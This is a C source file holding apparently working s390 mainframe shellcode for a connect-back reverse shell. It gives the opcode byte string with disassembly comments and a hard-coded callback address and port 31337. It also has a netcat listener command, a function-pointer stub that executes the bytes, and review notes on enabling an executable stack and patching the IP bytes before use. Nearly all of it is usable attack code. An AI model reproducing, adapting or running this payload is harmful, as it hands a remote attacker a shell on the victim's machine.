1 /*----------------------------------------------------------------------*/
\r
2 /* s390 shellcode, 0x0a / 0x00 free (code bytes only -- see the note on the IP address below) */
\r
3 /* connect-back shell; start a netcat listener on the connect-back host first: nc -l -p 31337 */
\r
4 /* ATTENTION ! Although the code bytes are 0x0a and 0x00 free, the target  */

5 /* address you want to connect back to may not be: 10.65.120.22 (the       */

6 /* example embedded below) contains 0x0a, and 192.168.0.1 contains 0x00.  */

7 /* In such cases consider adding self-modifying code that patches the IP   */

8 /* address bytes on the fly, the same way the svc opcodes are patched here. */
\r
9 /* code jcyberpunk@thehackerschoice.com */
\r
10 /*----------------------------------------------------------------------*/
\r
12 "\x0d\x10" /* basr %r1,%r0 */
\r
13 "\x41\x90\x10\xa8" /* la %r9,168(%r1) */
\r
14 "\xa7\x68\x04\x56" /* lhi %r6,1110 */
\r
15 "\xa7\xa8\xfb\xb4" /* lhi %r10,-1100 */
\r
16 "\x1a\x6a" /* ar %r6,%r10 */
\r
17 "\x42\x60\x10\xa8" /* stc %r6,168(%r1) */
\r
18 "\xa7\x28\x04\x4e" /* lhi %r2,1102 */
\r
19 "\x1a\x2a" /* ar %r2,%r10 */
\r
20 "\x40\x20\xf0\x78" /* sth %r2,120(%r15) */
\r
21 "\xa7\x38\x7a\x69" /* lhi %r3,31337 */
\r
22 "\x40\x30\xf0\x7a" /* sth %r3,122(%r15) */
\r
23 "\x58\x40\x10\xac" /* l %r4,172(%r1) */
\r
24 "\x50\x40\xf0\x7c" /* st %r4,124(%r15) */
\r
25 "\x17\x44" /* xr %r4,%r4 */
\r
26 "\xa7\x38\x04\x4d" /* lhi %r3,1101 */
\r
27 "\x1a\x3a" /* ar %r3,%r10 */
\r
28 "\x90\x24\xf0\x80" /* stm %r2,%r4,128(%r15) */
\r
29 "\xa7\x28\x04\x4d" /* lhi %r2,1101 */
\r
30 "\x1a\x2a" /* ar %r2,%r10 */
\r
31 "\x41\x30\xf0\x80" /* la %r3,128(%r15) */
\r
32 "\x0d\xe9" /* basr %r14,%r9 */
\r
33 "\x18\x72" /* lr %r7,%r2 */
\r
34 "\x41\x30\xf0\x78" /* la %r3,120(%r15) */
\r
35 "\xa7\x88\x04\x5c" /* lhi %r8,1116 */
\r
36 "\x1a\x8a" /* ar %r8,%r10 */
\r
37 "\x18\x48" /* lr %r4,%r8 */
\r
38 "\x90\x24\xf0\x80" /* stm %r2,%r4,128(%r15) */
\r
39 "\xa7\x28\x04\x4f" /* lhi %r2,1103 */
\r
40 "\x1a\x2a" /* ar %r2,%r10 */
\r
41 "\x41\x30\xf0\x80" /* la %r3,128(%r15) */
\r
42 "\x0d\xe9" /* basr %r14,%r9 */
\r
43 "\x18\x27" /* lr %r2,%r7 */
\r
44 "\xa7\x68\x04\x8b" /* lhi %r6,1163 */
\r
45 "\x1a\x6a" /* ar %r6,%r10 */
\r
46 "\x42\x60\x10\xa9" /* stc %r6,169(%r1) */
\r
47 "\xa7\x38\x04\x4e" /* lhi %r3,1102 */
\r
48 "\x1a\x3a" /* ar %r3,%r10 */
\r
49 "\x0d\xe9" /* basr %r14,%r9 */
\r
50 "\xa7\x3a\xff\xff" /* ahi %r3,-1 */
\r
51 "\x0d\xe9" /* basr %r14,%r9 */
\r
52 "\xa7\x3a\xff\xff" /* ahi %r3,-1 */
\r
53 "\x0d\xe9" /* basr %r14,%r9 */
\r
54 "\xa7\x68\x04\x57" /* lhi %r6,1111 */
\r
55 "\x1a\x6a" /* ar %r6,%r10 */
\r
56 "\x42\x60\x10\xa9" /* stc %r6,169(%r1) */
\r
57 "\x41\x20\x10\xb0" /* la %r2,176(%r1) */
\r
58 "\x50\x20\x10\xb8" /* st %r2,184(%r1) */
\r
59 "\x41\x30\x10\xb8" /* la %r3,184(%r1) */
\r
60 "\x17\x44" /* xr %r4,%r4 */
\r
61 "\x42\x40\x10\xb7" /* stc %r4,183(%r1) */
\r
62 "\x50\x40\x10\xbc" /* st %r4,188(%r1) */
\r
63 "\x41\x40\x10\xbc" /* la %r4,188(%r1) */
\r
64 "\x0d\xe9" /* basr %r14,%r9 */
\r
65 "\x0b\x66" /* svc 102 <--- after modification */
\r
66 "\x07\xfe" /* br %r14 */
\r
67 "\x0a\x41\x78\x16" /* ip-address to connect back */
\r
68 "\x2f\x62\x69\x6e" /* /bin */
\r
69 "\x2f\x73\x68\x5c"; /* /sh\\ */
\r
/* Entry point: the shellcode byte string is cast to a function pointer so  */
/* the caller can simply invoke z(). This executes data as code, so it only */
/* works while the memory holding shellcode is mapped executable.           */
/* NOTE(review): with a non-executable data/stack segment (the usual        */
/* toolchain default) calling z() faults -- link with an executable-stack   */
/* segment flag or copy the bytes into an explicitly executable mapping.    */
/* NOTE(review): the connect-back target is hard-coded in the string above  */
/* (bytes 0a 41 78 16 = 10.65.120.22, port 31337 via lhi %r3,31337);        */
/* patch those bytes before use.                                            */
73 void (*z)()=(void*)shellcode;
\r